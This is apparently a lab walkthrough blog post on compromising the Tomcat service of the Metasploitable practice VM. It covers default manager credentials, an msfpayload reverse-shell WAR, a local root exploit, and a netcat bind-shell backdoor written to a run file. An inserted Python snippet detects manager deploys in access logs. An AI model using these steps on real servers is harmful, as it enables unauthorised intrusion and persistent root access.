Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let's start with an Nmap scan…

So we can see on port 8180 we have Tomcat running… Let's take a look at it…

As we can see, the Tomcat manager requires a login. I know that by default the username and password are both ‘tomcat’, so let's try that.

We have logged into the manager application! Let's now take a look at generating a reverse shell.

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

^^^ This will generate our .WAR file, a web application archive that Apache Tomcat can deploy.

Metasploit uses a random string for the name of the .jsp page inside the WAR file… To find it we can extract the WAR file before we upload it.

As we can see, ktipihbvrq.jsp is our .jsp filename. The syntax to extract the archive is jar -xf <WAR file name>

172.16.28.248:8180/myshell/ktipihbvrq.jsp

^^^ This URL will kick off our reverse shell… Let's start up a listener…

nc -lvp 4444

^^^ Starts our netcat listener.
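From the defender's side, the upload-then-trigger sequence above leaves a clear trail in Tomcat's access log. The following is an added example, not code from the original post: it parses constructed access-log lines in Tomcat's "common" AccessLogValve pattern (assumed to be the format in use) and flags a successful manager upload followed by a request to a .jsp under a context that was not part of the baseline install (the baseline context set is an assumption to tune per server).

```python
import re

# Tomcat AccessLogValve "common" pattern (assumed in use): %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample log mirroring the walkthrough on port 8180: a 401 on the manager,
# a login as 'tomcat', an HTML-manager upload of myshell.war, then the first request
# to the freshly deployed context's randomly named JSP. Not a real capture.
SAMPLE_LOG = """\
172.16.28.245 - - [01/Sep/2014:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.28.245 - tomcat [01/Sep/2014:10:00:05 +0000] "GET /manager/html HTTP/1.1" 200 17000
172.16.28.245 - tomcat [01/Sep/2014:10:00:40 +0000] "POST /manager/html/upload HTTP/1.1" 200 17500
172.16.28.245 - - [01/Sep/2014:10:00:55 +0000] "GET /myshell/ktipihbvrq.jsp HTTP/1.1" 200 0
10.0.0.7 - - [01/Sep/2014:10:01:00 +0000] "GET /examples/jsp/index.html HTTP/1.1" 200 500
"""

# Contexts that ship with a stock Tomcat install (assumed baseline; tune per server).
BASELINE_CONTEXTS = {"manager", "host-manager", "examples", "docs", "ROOT"}

def parse_access_log(text):
    """Yield one dict per well-formed access-log line; silently skip anything else."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def find_manager_deploys(text):
    """Return (kind, host, user, path) findings for manager deploys and follow-on JSP hits."""
    findings = []
    deployers = set()  # hosts that have successfully pushed something through the manager
    for rec in parse_access_log(text):
        path = rec["path"].split("?", 1)[0]       # drop query string (e.g. CSRF nonce)
        context = path.split("/")[1] if path.count("/") else ""
        # HTML manager upload (used in the walkthrough) or the text-API deploy of newer Tomcats
        is_deploy = (path.startswith("/manager/html/upload")
                     or path.startswith("/manager/text/deploy"))
        if is_deploy and rec["method"] in ("POST", "PUT") and rec["status"] == "200":
            deployers.add(rec["host"])
            findings.append(("manager_deploy", rec["host"], rec["user"], path))
        elif path.endswith(".jsp") and context not in BASELINE_CONTEXTS and deployers:
            # A JSP under a context absent at baseline, right after a deploy: the
            # exact pattern of an uploaded WAR such as myshell.war being triggered.
            findings.append(("new_context_jsp", rec["host"], rec["user"], path))
    return findings

if __name__ == "__main__":
    for finding in find_manager_deploys(SAMPLE_LOG):
        print(finding)
```

Restricting the manager to localhost or a management network and removing the default ‘tomcat’ account would stop the first step entirely; the log check catches the case where that was not done.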

As you can see we now have a shell as tomcat55!

Let's run a tool called LinuxPrivChecker.py

So Linux Priv Checker tells us that http://www.exploit-db.com/exploits/8572/ is a good candidate to get us root. Let's try it out by following what the comments tell us to do with it…

First I will compile it. (My machine and the target are both x86 32-bit.)

Now that I have compiled the exploit with gcc 8572.c -o 8572 and uploaded it, let's pass it what was requested…

BUT first we need to create a run file, as it says in the comments. This is why it is important to read all the info before starting to play with an exploit. Comments are gold when working with someone else’s code.

For this I am just going to create a simple netcat bind shell.

echo "#!/bin/sh" > run

echo "/bin/netcat -lvp 4447 -e /bin/sh" >> run

Again, this is why reading the comments is important. If you read them you see they say “usually minus 1”; in our case it was not minus 1, it worked with the exact PID.


And we have root!

As you can see, we connected from our attacking box to the new bind shell. Because this was a local root exploit, the script we created at /tmp/run was executed as root, giving us a simple netcat root backdoor on port 4447.

Hope you enjoyed the video! Send feedback to feedback@overflowsecurity.com

-Justin (Eagle11)
